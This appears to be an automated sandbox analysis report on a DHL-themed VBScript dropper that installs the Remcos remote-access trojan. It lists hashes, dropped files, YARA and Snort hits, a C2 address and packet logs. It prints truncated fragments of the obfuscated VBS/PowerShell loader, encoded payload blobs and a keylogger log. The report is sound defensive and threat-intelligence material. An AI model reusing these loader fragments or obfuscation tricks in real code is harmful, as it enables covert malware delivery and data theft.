                                            Document_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                            • 46.254.34.12
                                            360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                            • 46.254.34.12
                                            ad.msiGet hashmaliciousLatrodectusBrowse
                                            • 46.254.34.12
                                            SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsxGet hashmaliciousUnknownBrowse
                                            • 46.254.34.12
                                            SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 46.254.34.12
                                            ProconGO1121082800.LnK.lnkGet hashmaliciousUnknownBrowse
                                            • 46.254.34.12
                                            file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                            • 46.254.34.12
                                            Version.125.7599.75.jsGet hashmaliciousSocGholishBrowse
                                            • 46.254.34.12
                                            Database4.exeGet hashmaliciousUnknownBrowse
                                            • 46.254.34.12

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):961
                                            Entropy (8bit):5.00769637274414
                                            Encrypted:false
                                            SSDEEP:12:tkEQnd6CsGkMyGWKyGXPVGArwY3TogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7+:qPdRNuKyGX85JvXhNlT3/7SxDWro
                                            MD5:BB19280E017D2F9A45F96479794EDA2B
                                            SHA1:0B90C47DC19AE285F7F4BA6557174D29827BFE44
                                            SHA-256:BA2C6ED473707347D40A4ED1B317325A0B78016A36B2A6A9DA43EB2CF63B9046
                                            SHA-512:52B868D2AA5E0C867E7EA7D81A7113FF5B5B39068B4543D113691B39EDD05FD8A1D57F446FE62083247933C347698193CCB72A78732F7E3319736CD5326C6F63
                                            Malicious:false
                                            Preview:{. "geoplugin_request":"102.129.152.220",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):11608
                                            Entropy (8bit):4.886255615007755
                                            Encrypted:false
                                            SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                            MD5:C7F7A26360E678A83AFAB85054B538EA
                                            SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                            SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                            SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                            Malicious:false
                                            Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1436
                                            Entropy (8bit):5.437764879487421
                                            Encrypted:false
                                            SSDEEP:24:3jmWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NK3R8oHr689fOcT4:zmWSU4y4RQmFoUeWmfmZ9tK8NWR8oHXI
                                            MD5:593D19E3C65563C1C1D73237D902B1B6
                                            SHA1:CDE70F31ADC8EE7487CF517832C331746A9D94DD
                                            SHA-256:5AC398D2E84850C039D71773FB268073126DC9198DF4B7248B4CCE48A5093B1C
                                            SHA-512:09FC89B566EE2F0EA648BB9FB69A92F6E3028F50A2ABD46E57E68767A08E274E0C1FF7A278AC9EDEBBC3490B66BBE6D6B7D1F82E51046CBD9ED5C91A1B25BF0D
                                            Malicious:false
                                            Preview:@...e...........%.....................&..............@..........P................1]...E.....%.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                            C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:ASCII text, with very long lines (335), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8587
                                            Entropy (8bit):5.25529939095443
                                            Encrypted:false
                                            SSDEEP:192:mqP55HoHhiNKQepDyqvxsZWVjFS0FGl0QKK:mG/oHgEtDyqvxQmA0FGWQKK
                                            MD5:0F7343F135E619692979BCB2818EE1B9
                                            SHA1:9D1D760475FDFDC5C69E97A67884442FE0B53245
                                            SHA-256:0B904E322E186D4D593C0057CE972F1B4317DD59855F65BCA513B63AA01EC14F
                                            SHA-512:E3F1CC9DB3A19896761A75973FDC2D8BE71C70247F37C213B35290D4F1D992F087DBD54BC4677BBEB29041745819086B72E1DB799196C4F4859BFE3CD4902578
                                            Malicious:true
                                            Preview:........Set Posttympanic = CreateObject("Scripting.FileSystemObject")......Melene = Posttympanic.OpenTextFile("C:\windows\notepad.exe", 1).ReadAll....Evaporator = instr(1,Melene,"u")......Set Energised = CreateObject("WScript.Shell")....Gejster = "s"....fljtekedlers = "Sapim"....Knaldromanerne = "replace"......Pyromanbrands = mid(Melene,Evaporator,1)....Nothus = "Alter"......su9 = su9 & "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='AlterbSapimtrin';$Fornrmet+='g';FAlternction CircAltermflexeSapim($CAltermAlterlet){$Semimonarchically=$CAltermAlterlet.Length-$Raakolde;For($HabitAlterally=4; $HabitAlterally -lt $Semimonarchically; $HabitAlterally+=(5)){$Wenzel+=$CAltermAlterlet.$Fornrmet.Invoke($HabitA"..su9 = su9 & "lterally, $Raakolde);}$Wenzel;}fAlternction JetteSapim($trendy){&($IndbagendeSapim) ($trendy);}$SimAlterltanSapimcenerSapim=CircAltermflexeSapim 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,Sapimp Ryg.( KrmW.AlterrdiRiitn Sapim rdPi do.orhwAlloSapimHjem G,oN PraT.oli

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21gn1cvr.mos.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2u4npw35.e0j.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ey2gvbbt.de4.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4orpqzj.roa.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lohwdhxb.l5v.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzrggcit.xnm.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngmp2xy1.sd3.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuwthfb5.bb5.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\bhvB55A.tmp

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x06159722, page size 32768, DirtyShutdown, Windows version 10.0
                                            Category:dropped
                                            Size (bytes):17301504
                                            Entropy (8bit):0.7857334108338626
                                            Encrypted:false
                                            SSDEEP:6144:qdfjZb5aXEY2waXEY24URlMe2APXAP5APzAP/Ou8pHAPFJnTJnpbn+otnBQ+hR0D:oVU4e8KyXaKKjcrONseWY
                                            MD5:3624288A152C9DE331BD960C3201D13E
                                            SHA1:1E20F8C5961DFCDB7F3F56F14230067ED23BA756
                                            SHA-256:51DDE2819D66C0BAF35567BD5C6F2044AD85D7C7C49C6ED68F2B6E5788E97E7C
                                            SHA-512:50246CD427266CD348A5D330DA8A09AF7AA7730C948971005F88290B84A40CF1CDBCAF748850DC7422C91AE4881230A41755204E70191A36F04FB1EB02C4F8C3
                                            Malicious:false
                                            Preview:..."... .......;!......E{ow("...{........................@.....-....{..''...|u.h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]..................................Co.''...|...................|.Z''...|u..........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\cUb5G1h4

                                            Download File
                                            Process:C:\Windows\SysWOW64\clip.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                            Category:dropped
                                            Size (bytes):196608
                                            Entropy (8bit):1.121297215059106
                                            Encrypted:false
                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                            Malicious:false
                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                            Category:dropped
                                            Size (bytes):2
                                            Entropy (8bit):1.0
                                            Encrypted:false
                                            SSDEEP:3:Qn:Qn
                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                            Malicious:false
                                            Preview:..

                                            C:\Users\user\AppData\Roaming\Antillean144.Gro

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):454784
                                            Entropy (8bit):5.968090988493347
                                            Encrypted:false
                                            SSDEEP:6144:fzFkw87Vb0haEK76Lx6YmPyBNMj8L3sXnsi+vVSWegdiJxgRL2qcQlRd2eN8VNK6:rFAScSyXnX4VZPo62qcQfIrKEf
                                            MD5:82C97A7D5E458BD3D08271224A2B6ECF
                                            SHA1:AA6715666D0DF4EA855B905619D9EBBCF3AA06E8
                                            SHA-256:F07FD6C5282995B1EA8403EEA90EBA41749EF50EB6AE50DC3238DF7C0780BEE4
                                            SHA-512:C2BB089A7A132E5A81C70869A2BE0FCC164E236D908F42F9DD9FD453632333CE33945D44089E910283F2B04A2B14FB6D8729D45129E9EA3936BF28AE4BC065B8
                                            Malicious:false
                                            Preview:cQGb6wJ2g7titAsA6wJ8busCE9EDXCQEcQGb6wIEvLkoP3u26wJVSHEBm4HxYeWBp3EBm3EBm4HxSdr6EXEBm3EBm+sCx/lxAZu6U5AbLXEBm3EBm3EBm3EBmzHK6wKxI+sCtj2JFAtxAZvrAktB0eJxAZtxAZuDwQTrAs3dcQGbgfle/vwCfMxxAZvrAn5yi0QkBOsCqX/rAlSqicNxAZvrAhtogcO+Z4QAcQGbcQGbusgh0upxAZvrAsrxgfK1KeJ+6wLjnesCis+BwoP3z2vrAreRcQGbcQGbcQGb6wJfRHEBm4sMEHEBm3EBm4kME3EBm3EBm0LrAmoscQGbgfoczwQAdddxAZvrAhAXiVwkDHEBm3EBm4HtAAMAAHEBm+sCL9iLVCQI6wJTLnEBm4t8JARxAZtxAZuJ6+sCei1xAZuBw5wAAABxAZtxAZtTcQGbcQGbakDrAl8S6wJDoYnr6wIGzXEBm8eDAAEAAADACwPrAnN86wKmoYHDAAEAAOsCnt1xAZtTcQGb6wKSt4nrcQGbcQGbibsEAQAA6wKEEOsCOCeBwwQBAADrAuoD6wJ5ElNxAZvrAs/6av/rArnlcQGbg8IF6wIS2HEBmzH26wKRnHEBmzHJcQGbcQGbixpxAZvrAtKzQesCoY1xAZs5HAp183EBm3EBm0ZxAZtxAZuAfAr7uHXfcQGb6wKG0otECvxxAZtxAZsp8OsC525xAZv/0usCvh7rApHsuhzPBADrArTncQGbMcDrAtFAcQGbi3wkDOsCQtTrAisTgTQHJlHg5usC+4HrAkLog8AEcQGb6wKi0znQdePrApRMcQGbifvrAoU4cQGb/9frAjUwcQGbQKYjXVIHXjEkpo9n2I3g5iZeZBqYVeC4r7Rps4brqQoIT2EUqr5UUqejFvo0MGEk67KX0g+Fa7OGuvyq6lSdQX/OpTZqA1fFDeyB16RuzKfxoYwh1AZjs0BoIm/D6O26WQcL/NEa24CG

                                            C:\Users\user\AppData\Roaming\Presignal23.Hal

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):465652
                                            Entropy (8bit):5.966380921856515
                                            Encrypted:false
                                            SSDEEP:12288:4YSOPSqx7DEgZRwC8inhPOeWvZeAbccV+:U8pZaC7nhGHwfE+
                                            MD5:C5A7A07491D572F6DB1512405C42FEC6
                                            SHA1:9AEBC59138DC1135BF89215D507A5AB10ADDE6D2
                                            SHA-256:4E05AAAE11AB146CCFC4C25EDE0524F31DC7CEA5DF170B563208EB0402E8E0BC
                                            SHA-512:8E242E9CCFB5C75845A569B26BA3DE11F2E74A56F61F4EBABFB4322FE7E7AB0F7C6A11FF26DA9B9F3AFD4CE11FC7CD83BF527D1E79428D4F5B09C85119428761
                                            Malicious:false
                                            Preview:cQGbcQGbu2aiGQDrArbZcQGbA1wkBOsC/ilxAZu5Gda+SnEBm+sCNKyBwTTsAtdxAZvrAi3vgcGzPT7ecQGbcQGb6wI3lXEBm7rxqG9JcQGbcQGbcQGb6wKAzTHK6wLx7usCNJmJFAvrAmmh6wLDAdHi6wIc73EBm4PBBOsCY45xAZuB+VqAMgJ8yesCMrXrAny4i0QkBOsCqwXrAjcRicNxAZtxAZuBwzXmuwHrAqeecQGbup7sgN9xAZtxAZuB8r1PDkXrAkRt6wL7bYHyI6OOmnEBm+sCLDTrAjbC6wIj6+sCpCLrAq+CiwwQ6wLo1usCaD+JDBNxAZtxAZtC6wL8pesCFSKB+njkBAB103EBm+sCxqCJXCQM6wKF4XEBm4HtAAMAAHEBm3EBm4tUJAhxAZvrAtYIi3wkBHEBm+sC+B6J63EBm3EBm4HDnAAAAHEBm3EBm1PrAiZlcQGbakDrAg1KcQGbietxAZvrAoBIx4MAAQAAADBPAnEBm3EBm4HDAAEAAOsCsO1xAZtTcQGb6wKAVInrcQGb6wJxr4m7BAEAAOsC/0vrAtrsgcMEAQAA6wK6vnEBm1NxAZvrAqmHav9xAZtxAZuDwgVxAZvrApHYMfZxAZtxAZsxyXEBm+sCzHmLGusCSQHrArL9QesCZ0FxAZs5HAp18+sCbd3rAroJRnEBm+sCT8qAfAr7uHXccQGbcQGbi0QK/HEBm+sCUQop8OsCv81xAZv/0usCvi/rAgsBunjkBABxAZtxAZsxwHEBm3EBm4t8JAzrAirecQGbgTQH26pvFOsC6cpxAZuDwATrAl4y6wLK4DnQdePrAtzRcQGbifvrAmBScQGb/9frAurbcQGbX07m8VpGHOp/o+7QqFHLHY4jiq2iUQAVWkN8wX+g7uUGPDF0WlvMpE48qFDWqh2BIU3r11947mDWqhWxRSjv6eCSmJWvp28Zsvc8lbenbxGCk1ktASuuyfVObZUyc0Hw2W3q

                                            C:\Users\user\AppData\Roaming\mvourhjs.dat

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1240
                                            Entropy (8bit):3.3559150808481397
                                            Encrypted:false
                                            SSDEEP:24:66cmhWqU6aWqUAGAlWqUASAYWqUkqWqURy8RIXRGG1vWtm1zW+:hcYWZWiWbWXWXySIBGGtWYRW+
                                            MD5:A4ABCD2F54829986CAA70C38BBD1099D
                                            SHA1:C32DBB06D14492224310B5CE4DA9E1A342ABFB53
                                            SHA-256:747DB831A3D8395C1786A9569EB8A775720D2C77792120D363CC24A54EC4EE3F
                                            SHA-512:E6469C09A61F738A67C7CD3BF26994A12B34BA8F52F416313ADB0E7EBB3BFED0306CACDC8EE6A325E4664884CA5CBD07B72BF7DB116E1497D7403A4A34AF34B0
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mvourhjs.dat, Author: Joe Security
                                            Preview:....[.2.0.2.4./.0.4./.2.6. .0.7.:.4.0.:.3.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.4./.2.6. .0.7.:.4.0.:.3.8. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.4./.2.6. .0.7.:.4.0.:.4.1. .R.u.n.].........[.2.0.2.4./.0.4./.2.6. .0.7.:.4.0.:.4.4. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.4./.2.6. .0.7.:.4.1.:.1.6. .R.u.n.].........[.2.0.2.4./.0.4./.2.6. .0.7.:.4.1.:.2.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.4./.2.6. .0.7.:.4.1.:.3.0. .R.u.n.].........[.2.0.2.4./.0.4./.2.6. .0.7.:.4.1.:.4.0. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.4./.2.6. .0.7.:.4.2.:.3.2. .R.u.n.].........[.2.0.2.4./.0.4./.2.6. .0.9.:.1.1.:.4.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.4./.2.7. .1.9.:.2.2.:.1.5. .R.u.n.].........[.2.0.2.4./.0.4./.2.7. .1.9.:.2.6.:.2.9. .F.i.l.e. .E.x.p.l.o.r.e.r.].........[.2.0.2.4./.0.4./.2.7. .1.9.:.2.7.:.0.1. .C.o.n.t.a.c.t.

                                            Static File Info

                                            General

                                            File type:ASCII text, with very long lines (338), with CRLF line terminators
                                            Entropy (8bit):5.172522257863658
                                            TrID:
                                              File name:DHL_ES567436735845755676678877988975877.vbs
                                              File size:8'928 bytes
                                              MD5:d0d8e78e99c4c59061e7caa5d254e8e9
                                              SHA1:f06eff42be48b3ff12d8597fc4a155a293ed4236
                                              SHA256:0895ad5d19828edc6d17054edb6d9eebdec60e587167716f2271bd683290aaf8
                                              SHA512:32541443ea184311f837a8f9e03d3c7bed2190d577309909482908bf32ee4552e2868ab413601c7ee3f555fe43a6687d7e5b7a88cc23a7c5d88f3710c937dd31
                                              SSDEEP:192:CXa/1TKd7tWSdiIJ+qdNkV8pH6QM562IfDkyjFzx:CX21aIKvu8pHFt2chjVx
                                              TLSH:6C02C558B8AB8D338D9F0991F597CA50AF1198CCEF8A05573246C3DF10BF584AB16C9D
                                              File Content Preview:........Set Odalborn = CreateObject("Scripting.FileSystemObject")......Stikbrevs = Odalborn.OpenTextFile("C:\windows\notepad.exe", 1).ReadAll....Konsekvensndringernes = instr(1,Stikbrevs,"u")......Set Kakerlakker = CreateObject("WScript.Shell")....Ttte =

                                              File Icon

                                              Icon Hash:68d69b8f86ab9a86

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              04/26/24-07:40:40.590604TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response30504971545.88.90.110192.168.2.5
                                              04/26/24-07:40:40.309700TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497153050192.168.2.545.88.90.110

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 26, 2024 07:39:55.677015066 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:55.677108049 CEST44349704188.212.111.134192.168.2.5
                                              Apr 26, 2024 07:39:55.677225113 CEST49704443192.168.2.5188.212.111.134
                                              Apr 26, 2024 07:39:55.685599089 CEST49704443192.168.2.5188.212.111.134
